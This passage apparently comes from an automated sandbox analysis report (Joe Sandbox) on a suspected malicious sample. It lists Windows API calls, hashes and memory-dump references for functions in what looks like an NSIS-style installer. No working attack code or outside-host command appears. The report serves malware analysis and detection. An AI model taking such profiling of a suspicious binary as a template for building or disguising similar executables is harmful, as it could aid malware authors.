                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: File$NamePathShort$AllocCloseGlobalHandleMovePointerSizelstrcpywsprintf
                                                  • String ID:
                                                  • API String ID: 1930046112-0
                                                  • Opcode ID: 1e4010844bb8ba65faee9067da085bc24f8460d998ee42ad1bb04f80e0c5d623
                                                  • Instruction ID: 441f6a94ec63c8a803b4d3fb3af655611ae8c98ae086b365179572a1c2ea722f
                                                  • Opcode Fuzzy Hash: 1e4010844bb8ba65faee9067da085bc24f8460d998ee42ad1bb04f80e0c5d623
                                                  • Instruction Fuzzy Hash: 03D09E32108601AEDA511B50DD05A1B7FB1BF94355F11C42EF585540B1DB358861DF09
                                                  Function 004034C7 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034D5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                  • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                  • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                  • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D

                                                  Non-executed Functions

                                                  Function 004056F8 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 00405756
                                                  • GetDlgItem.USER32(?,000003EE), ref: 00405765
                                                  • GetClientRect.USER32(?,?), ref: 004057A2
                                                  • GetSystemMetrics.USER32(00000002), ref: 004057A9
                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057CA
                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057DB
                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057EE
                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057FC
                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040580F
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405831
                                                  • ShowWindow.USER32(?,00000008), ref: 00405845
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405866
                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405876
                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040588F
                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040589B
                                                  • GetDlgItem.USER32(?,000003F8), ref: 00405774
                                                    • Part of subcall function 004044E8: SendMessageW.USER32(00000028,?,00000001,00404313), ref: 004044F6
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004058B8
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000568C,00000000), ref: 004058C6
                                                  • CloseHandle.KERNEL32(00000000), ref: 004058CD
                                                  • ShowWindow.USER32(00000000), ref: 004058F1
                                                  • ShowWindow.USER32(?,00000008), ref: 004058F6
                                                  • ShowWindow.USER32(00000008), ref: 00405940
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405974
                                                  • CreatePopupMenu.USER32 ref: 00405985
                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405999
                                                  • GetWindowRect.USER32(?,?), ref: 004059B9
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059D2
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A0A
                                                  • OpenClipboard.USER32(00000000), ref: 00405A1A
                                                  • EmptyClipboard.USER32 ref: 00405A20
                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A2C
                                                  • GlobalLock.KERNEL32(00000000), ref: 00405A36
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A4A
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405A6A
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405A75
                                                  • CloseClipboard.USER32 ref: 00405A7B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: {
                                                  • API String ID: 590372296-366298937
                                                  • Opcode ID: 17f82a3091fa66928221ea1c6b9dda913e53b80d5dd41b689f6bd494f538d155
                                                  • Instruction ID: bada4f766a7f909e2fcc31d20e9d53a26b7aeb91fc87c8d9c8de415280c65713
                                                  • Opcode Fuzzy Hash: 17f82a3091fa66928221ea1c6b9dda913e53b80d5dd41b689f6bd494f538d155
                                                  • Instruction Fuzzy Hash: 4DB14AB1900608FFDF11AF61DD85AAE7B79FB48354F00813AFA41B61A0CB784A51DF68
                                                  Function 004049A4 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 275stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 004049F3
                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404A1D
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404ACE
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404AD9
                                                  • lstrcmpiW.KERNEL32(007A6200,007A1748,00000000,?,?), ref: 00404B0B
                                                  • lstrcatW.KERNEL32(?,007A6200), ref: 00404B17
                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B29
                                                    • Part of subcall function 00405B78: GetDlgItemTextW.USER32(?,?,00000400,00404B60), ref: 00405B8B
                                                    • Part of subcall function 004067E2: CharNextW.USER32(?,*?|<>/":,00000000,007B3000,76233420,C:\Users\user\AppData\Local\Temp\,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00406845
                                                    • Part of subcall function 004067E2: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406854
                                                    • Part of subcall function 004067E2: CharNextW.USER32(?,007B3000,76233420,C:\Users\user\AppData\Local\Temp\,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00406859
                                                    • Part of subcall function 004067E2: CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 0040686C
                                                  • GetDiskFreeSpaceW.KERNEL32(0079F718,?,?,0000040F,?,0079F718,0079F718,?,00000001,0079F718,?,?,000003FB,?), ref: 00404BEC
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C07
                                                    • Part of subcall function 00404D60: lstrlenW.KERNEL32(007A1748,007A1748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E01
                                                    • Part of subcall function 00404D60: wsprintfW.USER32 ref: 00404E0A
                                                    • Part of subcall function 00404D60: SetDlgItemTextW.USER32(?,007A1748), ref: 00404E1D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: A
                                                  • API String ID: 2624150263-3554254475
                                                  • Opcode ID: 426e44edd7368518c1c7f183de8445ff04209b3407d9146befa81bf80a1aac5c
                                                  • Instruction ID: a16cb653eec2d326bc9532795c0b3c746b0ee9de9a15b8a8e70a0412fee6ffe7
                                                  • Opcode Fuzzy Hash: 426e44edd7368518c1c7f183de8445ff04209b3407d9146befa81bf80a1aac5c
                                                  • Instruction Fuzzy Hash: F3A194B1900208ABDB119FA6DD85BAF77B8EF84314F11803BF601B62D1D77C9A418B69
                                                  Function 004021AF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\nse5B61.tmp, xrefs: 0040226E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: CreateInstance
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nse5B61.tmp
                                                  • API String ID: 542301482-460192656
                                                  • Opcode ID: dc1c51b489d66c3ae56a3330a78418c281c6f978a235157eafada417e1326d44
                                                  • Instruction ID: ec9576eb85d19529fc8e70744cd4d9d757721a0e149670041693576dbfb17bce
                                                  • Opcode Fuzzy Hash: dc1c51b489d66c3ae56a3330a78418c281c6f978a235157eafada417e1326d44
                                                  • Instruction Fuzzy Hash: 82410575A00209AFCB40DFE4C989EAD7BB5FF48308B20456EF505EB2D1DB799982CB54
                                                  Function 00402910 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: dca364261a257630479412f8d24045f74174dcbea33d49aeb6f7c432ef55f1d3
                                                  • Instruction ID: a3e640cb8dc0d2d7f963ac08cc51882bce801df3f972718032989310b2356a06
                                                  • Opcode Fuzzy Hash: dca364261a257630479412f8d24045f74174dcbea33d49aeb6f7c432ef55f1d3
                                                  • Instruction Fuzzy Hash: 82F05E71904104AAD701EBA4EA499AEB378EF14314F60457BE102F21E0DBB849119B1A
                                                  Function 00404F20 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404F38
                                                  • GetDlgItem.USER32(?,00000408), ref: 00404F43
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F8D
                                                  • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FA4
                                                  • SetWindowLongW.USER32(?,000000FC,0040552D), ref: 00404FBD
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FD1
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FE3
                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404FF9
                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405005
                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405017
                                                  • DeleteObject.GDI32(00000000), ref: 0040501A
                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405045
                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405051
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050EC
                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040511C
                                                    • Part of subcall function 004044E8: SendMessageW.USER32(00000028,?,00000001,00404313), ref: 004044F6
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405130
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0040515E
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040516C
                                                  • ShowWindow.USER32(?,00000005), ref: 0040517C
                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405277
                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052DC
                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052F1
                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405315
                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405335
                                                  • ImageList_Destroy.COMCTL32(?), ref: 0040534A
                                                  • GlobalFree.KERNEL32(?), ref: 0040535A
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053D3
                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 0040547C
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040548B
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004054B6
                                                  • ShowWindow.USER32(?,00000000), ref: 00405504
                                                  • GetDlgItem.USER32(?,000003FE), ref: 0040550F
                                                  • ShowWindow.USER32(00000000), ref: 00405516
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 2564846305-813528018
                                                  • Opcode ID: 63eace971b309785bb82105d1f3aa94bb5e313571b6fc2e62422463636cbee33
                                                  • Instruction ID: 407b5383e9f0600e1b6d0dc6c9775fd3f0ad17fb7be6f4e7eeeed7564f32b1fa
                                                  • Opcode Fuzzy Hash: 63eace971b309785bb82105d1f3aa94bb5e313571b6fc2e62422463636cbee33
                                                  • Instruction Fuzzy Hash: F0028A70900608AFDF20DF65DD85AAF7BB5FB85314F10816AF610BA2E1D7798A41CF58
                                                  Function 00403FB4 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FF0
                                                  • ShowWindow.USER32(?), ref: 00404010
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404022
                                                  • ShowWindow.USER32(?,00000004), ref: 0040403B
                                                  • DestroyWindow.USER32 ref: 0040404F
                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404068
                                                  • GetDlgItem.USER32(?,?), ref: 00404087
                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040409B
                                                  • IsWindowEnabled.USER32(00000000), ref: 004040A2
                                                  • GetDlgItem.USER32(?,00000001), ref: 0040414D
                                                  • GetDlgItem.USER32(?,00000002), ref: 00404157
                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00404171
                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041C2
                                                  • GetDlgItem.USER32(?,00000003), ref: 00404268
                                                  • ShowWindow.USER32(00000000,?), ref: 00404289
                                                  • EnableWindow.USER32(?,?), ref: 0040429B
                                                  • EnableWindow.USER32(?,?), ref: 004042B6
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042CC
                                                  • EnableMenuItem.USER32(00000000), ref: 004042D3
                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042EB
                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042FE
                                                  • lstrlenW.KERNEL32(007A1748,?,007A1748,00000000), ref: 00404328
                                                  • SetWindowTextW.USER32(?,007A1748), ref: 0040433C
                                                  • ShowWindow.USER32(?,0000000A), ref: 00404470
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                  • String ID:
                                                  • API String ID: 1860320154-0
                                                  • Opcode ID: b08647c02fb37b41973a387d7810d7f5d0e6d787a748a85b5b12ca029d29054f
                                                  • Instruction ID: c568fb1f9e303522a8696359bfc4ff9199fb68b2c3e72f23d40ed4e3cc12537a
                                                  • Opcode Fuzzy Hash: b08647c02fb37b41973a387d7810d7f5d0e6d787a748a85b5b12ca029d29054f
                                                  • Instruction Fuzzy Hash: D3C1C0B1500604ABDB206F61EE85E2A3A68FBD6759F00853EFA51B51F0CB3D5881DB2D
                                                  Function 00404672 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404710
                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404724
                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404741
                                                  • GetSysColor.USER32(?), ref: 00404752
                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404760
                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040476E
                                                  • lstrlenW.KERNEL32(?), ref: 00404773
                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404780
                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404795
                                                  • GetDlgItem.USER32(?,0000040A), ref: 004047EE
                                                  • SendMessageW.USER32(00000000), ref: 004047F5
                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404820
                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404863
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00404871
                                                  • SetCursor.USER32(00000000), ref: 00404874
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0040488D
                                                  • SetCursor.USER32(00000000), ref: 00404890
                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048BF
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048D1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                  • String ID: N$E@
                                                  • API String ID: 3103080414-3433303851
                                                  • Opcode ID: 222016cd200aa2e6cb1c1b10df294e93f696a380f153465af12d712dc680f444
                                                  • Instruction ID: bdd40037bb0d452aa3b0c6711a4aa3bdd99b9424e38a8cf4b21d92dd7aac4ea1
                                                  • Opcode Fuzzy Hash: 222016cd200aa2e6cb1c1b10df294e93f696a380f153465af12d712dc680f444
                                                  • Instruction Fuzzy Hash: CB61C2B5900609BFDB10AF61DD85A6A7B69FB84304F00843AF701B62D0C77C9D61DF99
                                                  Function 0040617A Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406315,?,?), ref: 004061B5
                                                  • GetShortPathNameW.KERNEL32(?,007A4DE8,00000400), ref: 004061BE
                                                    • Part of subcall function 00405F89: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040626E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F99
                                                    • Part of subcall function 00405F89: lstrlenA.KERNEL32(00000000,?,00000000,0040626E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                                                  • GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 004061DB
                                                  • wsprintfA.USER32 ref: 004061F9
                                                  • GetFileSize.KERNEL32(00000000,00000000,007A55E8,C0000000,00000004,007A55E8,?,?,?,?,?), ref: 00406234
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406243
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040627B
                                                  • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A49E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062D1
                                                  • GlobalFree.KERNEL32(00000000), ref: 004062E2
